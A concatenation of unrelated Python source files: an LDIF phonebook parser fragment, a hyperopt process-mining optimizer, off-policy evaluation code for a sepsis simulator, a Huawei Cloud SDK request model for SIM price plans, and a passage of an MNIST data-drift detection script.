except ValueError:
#
# this is to exit the parse loop:
# we close the input file as soon as we have a result...
#
pass
def handle(self, dn, entry):
# debug("[FritzCallPhonebook] LDIF handle: " + dn)
found = re.match('.*cn=(.*),', str(dn))
if found:
name = found.group(1)
else:
return
address = ""
addressB = ""
if 'telephoneNumber' in entry or 'homePhone' in entry or 'mobile' in entry:
# debug("[FritzCallPhonebook] LDIF get address")
nameB = (name + ' (' + _('business') + ')') if name else ""
if 'company' in entry:
nameB = (nameB + ', ' + entry['company'][0]) if nameB else entry['company'][0]
if 'l' in entry:
addressB = entry['l'][0]
if 'postalCode' in entry:
addressB = entry['postalCode'][0] + ' ' + addressB
if 'c' in entry:
addressB = addressB + ', ' + entry['c'][0]
if 'street' in entry:
addressB = entry['street'][0] + ', ' + addressB
# debug("[FritzCallPhonebook] LDIF address: " + addressB)
if 'telephoneNumber' in entry:
no = normalizePhoneNumber(entry['telephoneNumber'][0])
result = nameB + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
self.outFun(no, result)
else:
if 'telephoneNumber' in entry:
no = normalizePhoneNumber(entry['telephoneNumber'][0])
result = nameB.replace('\n', ', ').replace('\r', '').replace('#', '')
self.outFun(no, result)
for i in ['homePhone', 'mobile']:
if i in entry:
no = normalizePhoneNumber(entry[i][0])
if i == 'mobile':
nameHM = name + ' (' + _('mobile') + ')'
else:
nameHM = name + ' (' + _('home') + ')'
if 'mozillaHomeLocalityName' in entry:
address = entry['mozillaHomeLocalityName'][0]
if 'mozillaHomePostalCode' in entry:
address = entry['mozillaHomePostalCode'][0] + ' ' + address
if 'mozillaHomeCountryName' in entry:
address = address + ', ' + entry['mozillaHomeCountryName'][0]
result = nameHM + ', ' + address.replace('\n', ', ').replace('\r', '').replace('#', '')
self.outFun(no, result)
else:
if addressB:
nameHM = nameHM + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
self.outFun(no, nameHM)
def lookedUp(number, name):
print(number + ' ' + name)
if __name__ == '__main__':
import os, sys
cwd = os.path.dirname(sys.argv[0])
if (len(sys.argv) == 1):
ReadNumbers(open("Kontakte.ldif"), out)
elif (len(sys.argv) == 2):
# nrzuname.py Nummer
FindNumber(sys.argv[1], open("Kontakte.ldif"), lookedUp)
|
<gh_stars>1-10
import copy
import math
import os
import random
from pathlib import Path
import numpy as np
import pandas as pd
from hyperopt import Trials, hp, fmin, STATUS_OK, STATUS_FAIL
from hyperopt import tpe
from . import support_utils as sup
from .cli_formatter import print_message, print_subsection
from .common_routines import mine_resources, extract_structure_parameters, split_timeline, evaluate_logs, \
save_times
from .configuration import Configuration, MiningAlgorithm, Metric, AndPriorORemove
from .decorators import timeit, safe_exec_with_values_and_status
from .readers.log_reader import LogReader
from .simulator import simulate
from .structure_miner import StructureMiner
from .support_utils import get_project_dir
from .writers import xml_writer as xml, xes_writer as xes
class StructureOptimizer:
"""Hyperparameter-optimizer class"""
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def __init__(self, settings: Configuration, log: LogReader, **kwargs):
self.space = self.define_search_space(settings)
self.log = log
self._split_timeline(0.8, settings.read_options.one_timestamp)
self.org_log = copy.deepcopy(log)
self.org_log_train = copy.deepcopy(self.log_train)
self.org_log_valdn = copy.deepcopy(self.log_valdn)
# Load settings
self.settings = settings
self.temp_output = get_project_dir() / 'outputs' / sup.folder_id()
if not os.path.exists(self.temp_output):
os.makedirs(self.temp_output)
self.file_name = os.path.join(self.temp_output, sup.file_id(prefix='OP_'))
# Results file
if not os.path.exists(self.file_name):
open(self.file_name, 'w').close()
# Trials object to track progress
self.bayes_trials = Trials()
self.best_output = None
self.best_parms = dict()
self.best_similarity = 0
@staticmethod
def define_search_space(settings: Configuration):
var_dim = {'gate_management': hp.choice('gate_management', settings.gate_management)}
if settings.mining_alg in [MiningAlgorithm.SM1, MiningAlgorithm.SM3]:
var_dim['epsilon'] = hp.uniform('epsilon', settings.epsilon[0], settings.epsilon[1])
var_dim['eta'] = hp.uniform('eta', settings.eta[0], settings.eta[1])
var_dim['and_prior'] = hp.choice('and_prior', AndPriorORemove.to_str(settings.and_prior))
var_dim['or_rep'] = hp.choice('or_rep', AndPriorORemove.to_str(settings.or_rep))
elif settings.mining_alg is MiningAlgorithm.SM2:
var_dim['concurrency'] = hp.uniform('concurrency', settings.concurrency[0], settings.concurrency[1])
csettings = copy.deepcopy(settings.__dict__)
for key in var_dim.keys():
csettings.pop(key, None)
space = {**var_dim, **csettings}
return space
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def execute_trials(self):
parameters = mine_resources(self.settings)
self.log_train = copy.deepcopy(self.org_log_train)
# @profile(stream=open('logs/memprof_StructureOptimizer.log', 'a+'))
def exec_pipeline(trial_stg: Configuration):
print_subsection("Trial")
print_message(f'train split: {len(pd.DataFrame(self.log_train.data).caseid.unique())}, '
f'validation split: {len(self.log_valdn.caseid.unique())}')
status = STATUS_OK
exec_times = dict()
sim_values = []
# Path redefinition
rsp = self._temp_path_redef(trial_stg, status=status, log_time=exec_times)
status = rsp['status']
trial_stg = rsp['values'] if status == STATUS_OK else trial_stg
# Structure mining
rsp = self._mine_structure(Configuration(**trial_stg), status=status, log_time=exec_times)
status = rsp['status']
# Parameters extraction
rsp = self._extract_parameters(trial_stg, rsp['values'], copy.deepcopy(parameters), status=status,
log_time=exec_times)
status = rsp['status']
# Simulate model
# rsp = self._simulate(trial_stg, self.log_valdn, status=status, log_time=exec_times)
# rsp = simulate(trial_stg, self.log_valdn, self.log_valdn, evaluate_fn=evaluate_logs)
rsp = self._simulate(trial_stg, status=status)
status = rsp['status']
sim_values = rsp['values'] if status == STATUS_OK else sim_values
# Save times
save_times(exec_times, trial_stg, self.temp_output)
# Optimizer results
rsp = self._define_response(trial_stg, status, sim_values)
# reinstate log
self.log = copy.deepcopy(self.org_log)
self.log_train = copy.deepcopy(self.org_log_train)
self.log_valdn = copy.deepcopy(self.org_log_valdn)
return rsp
# Optimize
best = fmin(fn=exec_pipeline,
space=self.space,
algo=tpe.suggest,
max_evals=self.settings.max_eval_s,
trials=self.bayes_trials,
show_progressbar=False)
# Save results
try:
results = pd.DataFrame(self.bayes_trials.results).sort_values('loss', ascending=bool)
self.best_output = results[results.status == 'ok'].head(1).iloc[0].output
self.best_parms = best
self.best_similarity = results[results.status == 'ok'].head(1).iloc[0].loss
except Exception as e:
print(e)
pass
# @profile(stream=open('logs/memprof_StructureOpimizer._temp_path_redef.log', 'a+'))
@timeit(rec_name='PATH_DEF')
@safe_exec_with_values_and_status
def _temp_path_redef(self, settings: dict, **kwargs) -> None:
# Paths redefinition
settings['output'] = Path(os.path.join(self.temp_output, sup.folder_id()))
# Output folder creation
if not os.path.exists(settings['output']):
os.makedirs(settings['output'])
os.makedirs(os.path.join(settings['output'], 'sim_data'))
# Create customized event-log for the external tools
output_path = Path(os.path.join(settings['output'], (settings['project_name'] + '.xes')))
xes.XesWriter(self.log_train, settings['read_options'], output_path)
return settings
@timeit(rec_name='MINING_STRUCTURE')
@safe_exec_with_values_and_status
def _mine_structure(self, settings: Configuration, **kwargs) -> None:
structure_miner = StructureMiner(settings)
structure_miner.execute_pipeline()
if structure_miner.is_safe:
return [structure_miner.bpmn, structure_miner.process_graph]
else:
raise RuntimeError('Mining Structure error')
# @profile(stream=open('logs/memprof_StructureOptimizer._extract_parameters.log', 'a+'))
@timeit(rec_name='EXTRACTING_PARAMS')
@safe_exec_with_values_and_status
def _extract_parameters(self, settings: Configuration, structure_values, parameters, **kwargs) -> None:
if isinstance(settings, dict):
settings = Configuration(**settings)
_, process_graph = structure_values
num_inst = len(self.log_valdn.caseid.unique()) # TODO: why do we use log_valdn instead of log_train?
start_time = self.log_valdn.start_timestamp.min().strftime("%Y-%m-%dT%H:%M:%S.%f+00:00") # getting minimum date
model_path = Path(os.path.join(settings.output, settings.project_name + '.bpmn'))
structure_parameters = extract_structure_parameters(
settings=settings, process_graph=process_graph, log=self.log_train, model_path=model_path)
parameters = {**parameters, **{'resource_pool': structure_parameters.resource_pool,
'time_table': structure_parameters.time_table,
'arrival_rate': structure_parameters.arrival_rate,
'sequences': structure_parameters.sequences,
'elements_data': structure_parameters.elements_data,
'instances': num_inst,
'start_time': start_time}}
bpmn_path = os.path.join(settings.output, settings.project_name + '.bpmn')
xml.print_parameters(bpmn_path, bpmn_path, parameters)
self.log_valdn.rename(columns={'user': 'resource'}, inplace=True)
self.log_valdn['source'] = 'log'
self.log_valdn['run_num'] = 0
self.log_valdn['role'] = 'SYSTEM'
self.log_valdn = self.log_valdn[~self.log_valdn.task.isin(['Start', 'End'])]
@safe_exec_with_values_and_status
def _simulate(self, trial_stg, **kwargs):
return simulate(trial_stg, self.log_valdn, self.log_valdn, evaluate_fn=evaluate_logs)
# @timeit(rec_name='SIMULATION_EVAL')
# @safe_exec_with_values_and_status
# def _simulate(self, settings: Configuration, data, **kwargs) -> list:
# if isinstance(settings, dict):
# settings = Configuration(**settings)
#
# reps = settings.repetitions
# cpu_count = multiprocessing.cpu_count()
# w_count = reps if reps <= cpu_count else cpu_count
# pool = multiprocessing.Pool(processes=w_count)
#
# # Simulate
# args = [(settings, rep) for rep in range(reps)]
# p = pool.map_async(execute_simulator, args)
# pbar_async(p, 'simulating:', reps)
#
# # Read simulated logs
# p = pool.map_async(read_stats, args)
# pbar_async(p, 'reading simulated logs:', reps)
#
# # Evaluate
# args = [(settings, data, log) for log in p.get()]
# if len(self.log_valdn.caseid.unique()) > 1000:
# pool.close()
# results = [evaluate_logs(arg) for arg in tqdm(args, 'evaluating results:')]
# sim_values = list(itertools.chain(*results))
# else:
# p = pool.map_async(evaluate_logs, args)
# pbar_async(p, 'evaluating results:', reps)
# pool.close()
# sim_values = list(itertools.chain(*p.get()))
# return sim_values
def _define_response(self, settings, status, sim_values, **kwargs) -> dict:
response = dict()
measurements = list()
data = {
'gate_management': settings['gate_management'],
'output': settings['output'],
}
# Miner parameters
if settings['mining_alg'] in [MiningAlgorithm.SM1, MiningAlgorithm.SM3]:
data['epsilon'] = settings['epsilon']
data['eta'] = settings['eta']
data['and_prior'] = settings['and_prior']
data['or_rep'] = settings['or_rep']
elif settings['mining_alg'] is MiningAlgorithm.SM2:
data['concurrency'] = settings['concurrency']
else:
raise ValueError(settings['mining_alg'])
similarity = 0
# response['params'] = settings
response['output'] = settings['output']
if status == STATUS_OK:
similarity = np.mean([x['sim_val'] for x in sim_values])
loss = (1 - similarity)
response['loss'] = loss
response['status'] = status if loss > 0 else STATUS_FAIL
for sim_val in sim_values:
measurements.append({
**{'similarity': sim_val['sim_val'],
'sim_metric': sim_val['metric'],
'status': response['status']},
**data})
else:
response['status'] = status
measurements.append({**{'similarity': 0,
'sim_metric': Metric.DL,
'status': response['status']},
**data})
if os.path.getsize(self.file_name) > 0:
sup.create_csv_file(measurements, self.file_name, mode='a')
else:
sup.create_csv_file_header(measurements, self.file_name)
return response
def _split_timeline(self, size: float, one_ts: bool) -> None:
"""
Split an event log dataframe by time to perform split-validation. preferred method time splitting removing
incomplete traces. If the testing set is smaller than the 10% of the log size the second method is sort by
traces start and split taking the whole traces no matter if they are contained in the timeframe or not
Parameters
----------
size: float, validation percentage.
one_ts: bool, Support only one timestamp.
"""
train, validation, key = split_timeline(self.log, size, one_ts)
train = self._sample_log(train)
# Save partitions
self.log_valdn = validation.sort_values(key, ascending=True).reset_index(drop=True)
self.log_train = LogReader.copy_without_data(self.log)
self.log_train.set_data(train.sort_values(key, ascending=True).reset_index(drop=True).to_dict('records'))
@staticmethod
def _sample_log(train):
def sample_size(p_size, c_level, c_interval):
"""
p_size : population size.
c_level : confidence level.
c_interval : confidence interval.
"""
c_level_constant = {50: .67, 68: .99, 90: 1.64, 95: 1.96, 99: 2.57}
Z = 0.0
p = 0.5
e = c_interval / 100.0
N = p_size
n_0 = 0.0
n = 0.0
# DEVIATIONS FOR THAT CONFIDENCE LEVEL
Z = c_level_constant[c_level]
# CALC SAMPLE SIZE
n_0 = ((Z ** 2) * p * (1 - p)) / (e ** 2)
# ADJUST SAMPLE SIZE FOR FINITE POPULATION
n = n_0 / (1 + ((n_0 - 1) / float(N)))
return int(math.ceil(n)) # THE SAMPLE SIZE
cases = list(train.caseid.unique())
if len(cases) > 1000:
sample_sz = sample_size(len(cases), 95.0, 3.0)
scases = random.sample(cases, sample_sz)
train = train[train.caseid.isin(scases)]
return train
|
import numpy as np
import torch
from sepsisSimDiabetes.State import State
feature_names = ["hr_state", "sysbp_state", "glucose_state",
"antibiotic_state", "vaso_state", "vent_state"]
# 'grade_norm' and 'pre' are relatively categorical/discrete
#unused_features = ['input_message_kid', 'time_stored', 'grade']
# categorical_features = ['stage'] # postive_feedback
# feature_names = ['grade_norm', 'pre-score_norm', 'stage_norm', 'failed_attempts_norm',
# 'pos_norm', 'neg_norm', 'hel_norm', 'anxiety_norm']
target_names = ["beh_p_0","beh_p_1","beh_p_2","beh_p_3","beh_p_4","beh_p_5","beh_p_6","beh_p_7"]
# feature_names = feature_names + categorical_features
MAX_TIME = 28
def compute_is_weights_for_mdp_policy(behavior_df, eval_policy, eps=0.05, temp=0.1,
reward_column='adjusted_score', no_grad=True,
gr_safety_thresh=0.0, is_train=True, normalize_reward=False, use_knn=False,
model_round_as_feature=False):
# is_weights with batch processing
df = behavior_df
user_ids = df['Trajectory'].unique()
n = len(user_ids)
# now max_time is dynamic, finally!!
MAX_TIME = max(behavior_df.groupby('Trajectory').size())
# assert reward_column in ['adjusted_score', 'reward']
pies = torch.zeros((n, MAX_TIME)) # originally 20
pibs = torch.zeros((n, MAX_TIME))
rewards = torch.zeros((n, MAX_TIME))
lengths = np.zeros((n)) # we are not doing anything to this
# compute train split reward mean and std
# (n,): and not average
user_rewards = df.groupby("Trajectory")[reward_column].mean()
train_reward_mu = user_rewards.mean()
train_reward_std = user_rewards.std()
for idx, user_id in enumerate(user_ids):
data = df[df['Trajectory'] == user_id]
# get features, targets
if not model_round_as_feature:
features = np.asarray(data[feature_names]).astype(float)
features_idx_list = []
for feature_idx in data['State_id']:
this_state = State(state_idx=feature_idx, idx_type='full',
diabetic_idx=1) # Diab a req argument, no difference
# assert this_state == State(state_idx = feature_idx, idx_type = 'full', diabetic_idx = 0)
features_idx_list.append(this_state.get_state_idx('proj_obs'))
features_idxs = np.array(features_idx_list).astype(int)
else:
features = np.asarray(data[feature_names + ['model_round']]).astype(float)
targets = np.asarray(data[target_names]).astype(float)
actions = np.asarray(data['Action_taken']).astype(int)
length = features.shape[0]
lengths[idx] = length
T = targets.shape[0]
# shape: (1, T)
beh_probs = torch.from_numpy(np.array([targets[i, a] for i, a in enumerate(actions)])).float()
pibs[idx, :T] = beh_probs
gr_mask = None
if gr_safety_thresh > 0:
if not is_train:
# we only use KNN during validation
if not use_knn:
gr_mask = None
# else:
# knn_targets = np.asarray(data[knn_target_names]).astype(float)
# assert knn_targets.shape[0] == targets.shape[0]
# beh_action_probs = torch.from_numpy(knn_targets)
#
# gr_mask = beh_action_probs >= gr_safety_thresh
else:
beh_action_probs = torch.from_numpy(targets)
# gr_mask = beh_probs >= gr_safety_thresh
gr_mask = beh_action_probs >= gr_safety_thresh
# need to renormalize behavior policy as well?
# assign rewards (note adjusted_score we only assign to last step)
# reward, we assign to all
if reward_column == 'Reward':
reward = max(np.asarray(data[reward_column]))
if reward == 0:
reward = min(np.asarray(data[reward_column]))
# only normalize reward during training
# if reward != 0:
# print("reward is {}".format(reward))
if normalize_reward and is_train:
# might not be the best -- we could just do a plain shift instead
# like -1 shift
reward = (reward - train_reward_mu) / train_reward_std
# print(reward)
# if reward != 0:
# print("reward is not zero")
rewards[idx, T - 1] = reward
else:
# normal reward
# rewards[idx, :T] = torch.from_numpy(np.asarray(data[reward_column])).float()
raise Exception("We currrently do not offer training in this mode")
# last thing: model prediction
# eval_action_probs = eval_policy.get_action_probability(torch.from_numpy(features).float(), no_grad,
# action_mask=gr_mask)
eval_action_probs = torch.from_numpy(eval_policy[features_idxs, :])
pies[idx, :T] = torch.hstack([eval_action_probs[i, a] for i, a in enumerate(actions)])
return pibs, pies, rewards, lengths.astype(int), MAX_TIME
def wis_ope(pibs, pies, rewards, length, no_weight_norm=False, max_time=MAX_TIME, per_sample=False, clip_lower=1e-16,
clip_upper=1e3):
# even for batch setting, this function should still work fine
# but for WIS, batch setting won't give accurate normalization
n = pibs.shape[0]
weights = torch.ones((n, MAX_TIME))
for i in range(n):
last = 1
for t in range(int(length[i])):
assert pibs[i, t] != 0
last = last * (pies[i, t] / pibs[i, t])
weights[i, t] = last
weights[i, length[i]:] = weights[i, length[i] - 1]
# weights = torch.clip(weights, 1e-16, 1e3)
weights = torch.clip(weights, clip_lower, clip_upper)
if not no_weight_norm:
weights_norm = weights.sum(dim=0)
weights /= weights_norm # per-step weights (it's cumulative)
else:
weights /= n
# this accumulates
if not per_sample:
return (weights[:, -1] * rewards.sum(dim=-1)).sum(dim=0), weights[:, -1]
else:
# return w_i associated with each N
return weights[:, -1] * rewards.sum(dim=-1), weights[:, -1] |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListProPricePlansRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'limit': 'int',
'offset': 'int',
'main_search_key': 'str',
'flow_total': 'int',
'network_type': 'int',
'location_type': 'int',
'carrier_type': 'int',
'country_type': 'int',
'sim_card_id': 'int',
'partner': 'int',
'package_type': 'int',
'sim_type': 'int'
}
attribute_map = {
'limit': 'limit',
'offset': 'offset',
'main_search_key': 'main_search_key',
'flow_total': 'flow_total',
'network_type': 'network_type',
'location_type': 'location_type',
'carrier_type': 'carrier_type',
'country_type': 'country_type',
'sim_card_id': 'sim_card_id',
'partner': 'partner',
'package_type': 'package_type',
'sim_type': 'sim_type'
}
def __init__(self, limit=None, offset=None, main_search_key=None, flow_total=None, network_type=None, location_type=None, carrier_type=None, country_type=None, sim_card_id=None, partner=None, package_type=None, sim_type=None):
"""ListProPricePlansRequest - a model defined in huaweicloud sdk"""
self._limit = None
self._offset = None
self._main_search_key = None
self._flow_total = None
self._network_type = None
self._location_type = None
self._carrier_type = None
self._country_type = None
self._sim_card_id = None
self._partner = None
self._package_type = None
self._sim_type = None
self.discriminator = None
if limit is not None:
self.limit = limit
if offset is not None:
self.offset = offset
if main_search_key is not None:
self.main_search_key = main_search_key
if flow_total is not None:
self.flow_total = flow_total
if network_type is not None:
self.network_type = network_type
if location_type is not None:
self.location_type = location_type
if carrier_type is not None:
self.carrier_type = carrier_type
if country_type is not None:
self.country_type = country_type
if sim_card_id is not None:
self.sim_card_id = sim_card_id
if partner is not None:
self.partner = partner
if package_type is not None:
self.package_type = package_type
if sim_type is not None:
self.sim_type = sim_type
@property
def limit(self):
"""Gets the limit of this ListProPricePlansRequest.
分页查询时每页显示的记录数,默认值为10,取值范围为10-500的整数
:return: The limit of this ListProPricePlansRequest.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListProPricePlansRequest.
分页查询时每页显示的记录数,默认值为10,取值范围为10-500的整数
:param limit: The limit of this ListProPricePlansRequest.
:type: int
"""
self._limit = limit
@property
def offset(self):
"""Gets the offset of this ListProPricePlansRequest.
分页查询时的页码数,默认值为1,取值范围为1-1000000的整数
:return: The offset of this ListProPricePlansRequest.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListProPricePlansRequest.
分页查询时的页码数,默认值为1,取值范围为1-1000000的整数
:param offset: The offset of this ListProPricePlansRequest.
:type: int
"""
self._offset = offset
@property
def main_search_key(self):
"""Gets the main_search_key of this ListProPricePlansRequest.
查询关键标识类型:套餐名称 例如中国香港每月10M联接服务
:return: The main_search_key of this ListProPricePlansRequest.
:rtype: str
"""
return self._main_search_key
@main_search_key.setter
def main_search_key(self, main_search_key):
"""Sets the main_search_key of this ListProPricePlansRequest.
查询关键标识类型:套餐名称 例如中国香港每月10M联接服务
:param main_search_key: The main_search_key of this ListProPricePlansRequest.
:type: str
"""
self._main_search_key = main_search_key
@property
def flow_total(self):
"""Gets the flow_total of this ListProPricePlansRequest.
流量总量(MB)
:return: The flow_total of this ListProPricePlansRequest.
:rtype: int
"""
return self._flow_total
@flow_total.setter
def flow_total(self, flow_total):
"""Sets the flow_total of this ListProPricePlansRequest.
流量总量(MB)
:param flow_total: The flow_total of this ListProPricePlansRequest.
:type: int
"""
self._flow_total = flow_total
@property
def network_type(self):
"""Gets the network_type of this ListProPricePlansRequest.
网络制式
:return: The network_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._network_type
@network_type.setter
def network_type(self, network_type):
"""Sets the network_type of this ListProPricePlansRequest.
网络制式
:param network_type: The network_type of this ListProPricePlansRequest.
:type: int
"""
self._network_type = network_type
@property
def location_type(self):
"""Gets the location_type of this ListProPricePlansRequest.
覆盖区域:1. 中国 2. 欧洲 3. 大洋洲 4. 非洲 5. 亚太
:return: The location_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._location_type
@location_type.setter
def location_type(self, location_type):
"""Sets the location_type of this ListProPricePlansRequest.
覆盖区域:1. 中国 2. 欧洲 3. 大洋洲 4. 非洲 5. 亚太
:param location_type: The location_type of this ListProPricePlansRequest.
:type: int
"""
self._location_type = location_type
@property
def carrier_type(self):
"""Gets the carrier_type of this ListProPricePlansRequest.
运营商 101/1 中国移动/中国移动(实体卡) 102/2中国电信/中国电信(实体卡) 3中国联通(实体卡) 201.欧洲 501.中国香港 502.中国澳门 503.泰国 504.日本 505.柬埔寨 506.印度尼西亚 507.马来西亚 508.新加坡 509.斯里兰卡 510.中国台湾 511.孟加拉
:return: The carrier_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._carrier_type
@carrier_type.setter
def carrier_type(self, carrier_type):
"""Sets the carrier_type of this ListProPricePlansRequest.
运营商 101/1 中国移动/中国移动(实体卡) 102/2中国电信/中国电信(实体卡) 3中国联通(实体卡) 201.欧洲 501.中国香港 502.中国澳门 503.泰国 504.日本 505.柬埔寨 506.印度尼西亚 507.马来西亚 508.新加坡 509.斯里兰卡 510.中国台湾 511.孟加拉
:param carrier_type: The carrier_type of this ListProPricePlansRequest.
:type: int
"""
self._carrier_type = carrier_type
@property
def country_type(self):
"""Gets the country_type of this ListProPricePlansRequest.
国家/地区 1中国香港,2中国澳门,3泰国,4日本,5,柬埔寨,6印尼,7马来西亚,8新加坡,9斯里兰卡,10中国台湾,11孟加拉
:return: The country_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._country_type
@country_type.setter
def country_type(self, country_type):
"""Sets the country_type of this ListProPricePlansRequest.
国家/地区 1中国香港,2中国澳门,3泰国,4日本,5,柬埔寨,6印尼,7马来西亚,8新加坡,9斯里兰卡,10中国台湾,11孟加拉
:param country_type: The country_type of this ListProPricePlansRequest.
:type: int
"""
self._country_type = country_type
@property
def sim_card_id(self):
"""Gets the sim_card_id of this ListProPricePlansRequest.
sim card id sim卡标识
:return: The sim_card_id of this ListProPricePlansRequest.
:rtype: int
"""
return self._sim_card_id
@sim_card_id.setter
def sim_card_id(self, sim_card_id):
"""Sets the sim_card_id of this ListProPricePlansRequest.
sim card id sim卡标识
:param sim_card_id: The sim_card_id of this ListProPricePlansRequest.
:type: int
"""
self._sim_card_id = sim_card_id
@property
def partner(self):
"""Gets the partner of this ListProPricePlansRequest.
伙伴
:return: The partner of this ListProPricePlansRequest.
:rtype: int
"""
return self._partner
@partner.setter
def partner(self, partner):
"""Sets the partner of this ListProPricePlansRequest.
伙伴
:param partner: The partner of this ListProPricePlansRequest.
:type: int
"""
self._partner = partner
@property
def package_type(self):
"""Gets the package_type of this ListProPricePlansRequest.
套餐类型
:return: The package_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._package_type
@package_type.setter
def package_type(self, package_type):
"""Sets the package_type of this ListProPricePlansRequest.
套餐类型
:param package_type: The package_type of this ListProPricePlansRequest.
:type: int
"""
self._package_type = package_type
@property
def sim_type(self):
"""Gets the sim_type of this ListProPricePlansRequest.
适用SIM卡类型
:return: The sim_type of this ListProPricePlansRequest.
:rtype: int
"""
return self._sim_type
@sim_type.setter
def sim_type(self, sim_type):
"""Sets the sim_type of this ListProPricePlansRequest.
适用SIM卡类型
:param sim_type: The sim_type of this ListProPricePlansRequest.
:type: int
"""
self._sim_type = sim_type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListProPricePlansRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
# -*- coding: utf-8 -*-
import copy
import logging
from pathlib import Path
import click
import matplotlib.pyplot as plt
import torch
from sklearn.manifold import Isomap
from torchvision import datasets, transforms
import torchdrift
from src.models.classifier import Classifier
from torchdrift.detectors.mmd import (ExpKernel, GaussianKernel,
RationalQuadraticKernel)
@click.command()
@click.argument("data_filepath", type=click.Path(), default="data")
@click.argument(
"trained_model_filepath", type=click.Path(), default="models/trained_model.pth"
)
def drift_detection(data_filepath, trained_model_filepath):
""" Implements drift detection with the MNIST project """
logger = logging.getLogger(__name__)
logger.info("Drift detection with the MNIST data set")
# Define a transform to normalize the data
transform = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,)),]
)
# Divide the training dataset into two parts:
# a training set and a validation set
project_dir = Path(__file__).resolve().parents[2]
train_set = datasets.MNIST(
project_dir.joinpath(data_filepath),
download=False,
train=True,
transform=transform,
)
batch_size = 64
train_loader = torch.utils.data.DataLoader(
train_set, batch_size=batch_size, shuffle=True
)
# Plot example images
N = 6
images, labels = iter(train_loader).next()
images_corrupt = corruption_function(images)
plt.figure(figsize=(15, 5))
for i in range(N):
# Plot the original MNIST image
plt.subplot(2, N, i + 1)
plt.title(labels[i].item())
plt.imshow(images[i][0], cmap="gray")
# plt.imshow(images[i].permute(1, 2, 0))
plt.xticks([])
plt.yticks([])
# Plot the MNIST image with Gaussian blur
plt.subplot(2, N, i + 1 + N)
plt.title(labels[i].item())
plt.imshow(images_corrupt[i][0], cmap="gray")
# plt.imshow(images[i].permute(1, 2, 0))
plt.xticks([])
plt.yticks([])
plt.show()
# Load the trained model
model = Classifier()
project_dir = Path(__file__).resolve().parents[2]
state_dict = torch.load(project_dir.joinpath(trained_model_filepath))
model.load_state_dict(state_dict)
model.return_features = True
# From: https://torchdrift.org/notebooks/drift_detection_on_images.html
# feature_extractor = copy.deepcopy(model)
# feature_extractor.classifier = torch.nn.Identity()
# The drift detector - Using the Kernel MMD drift detector on
# the features extracted by the pretrained model
gaussian_kernel = torchdrift.detectors.KernelMMDDriftDetector(
kernel=GaussianKernel()
)
exp_kernel = torchdrift.detectors.KernelMMDDriftDetector(kernel=ExpKernel())
rational_quadratic_kernel = torchdrift.detectors.KernelMMDDriftDetector(
kernel=RationalQuadraticKernel()
)
kernel_names = ["GaussianKernel", "ExpKernel", "RationalQuadraticKernel"]
scores_real, p_vals_real, scores_corrupt, p_vals_corrupt = [], [], [], []
for i, kernel in enumerate(
[gaussian_kernel, exp_kernel, rational_quadratic_kernel]
):
print(i)
kernel_name = kernel_names[i]
drift_detector = kernel
# Fit the drift detector using training data
torchdrift.utils.fit(train_loader, model, drift_detector, num_batches=20)
# Test the output on actual training inputs
features = model(images)
score = drift_detector(features)
p_val = drift_detector.compute_p_value(features)
scores_real.append(score)
p_vals_real.append(p_val)
print(p_val)
# Visualize the two distribution to detemine if the look close
mapper = Isomap(n_components=2)
base_embedded = mapper.fit_transform(drift_detector.base_outputs)
features_embedded = mapper.transform(features.detach().numpy())
f = plt.figure(figsize=(12, 8))
plt.scatter(base_embedded[:, 0], base_embedded[:, 1], s=2, c="r")
plt.scatter(features_embedded[:, 0], features_embedded[:, 1], s=4)
plt.title(f"{kernel_name} real data, score {score:.2f} p-value {p_val:.2f}")
# plt.show()
f.savefig(kernel_name + "_Distributions_Real_Data.pdf", bbox_inches="tight")
# Test the output on actual corrupt training inputs
features = model(images_corrupt)
score = drift_detector(features)
p_val = drift_detector.compute_p_value(features)
scores_corrupt.append(score)
p_vals_corrupt.append(p_val)
# Visualize the two distribution to detemine if the look close
features_embedded = mapper.transform(features.detach().numpy())
f = plt.figure(figsize=(12, 8))
plt.scatter(base_embedded[:, 0], base_embedded[:, 1], s=2, c="r")
plt.scatter(features_embedded[:, 0], features_embedded[:, 1], s=4)
plt.title(f"{kernel_name} corrupt data, score {score:.2f} p-value {p_val:.2f}")
# plt.show()
f.savefig(kernel_name + "_Distributions_Corrupt_Data.pdf", bbox_inches="tight")
print(scores_real)
print(p_vals_real)
print(scores_corrupt)
print(p_vals_corrupt)
def corruption_function(x: torch.Tensor):
""" Applies the Gsaussian blur to x """
return torchdrift.data.functional.gaussian_blur(x, severity=5)
if __name__ == "__main__":
log_fmt = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
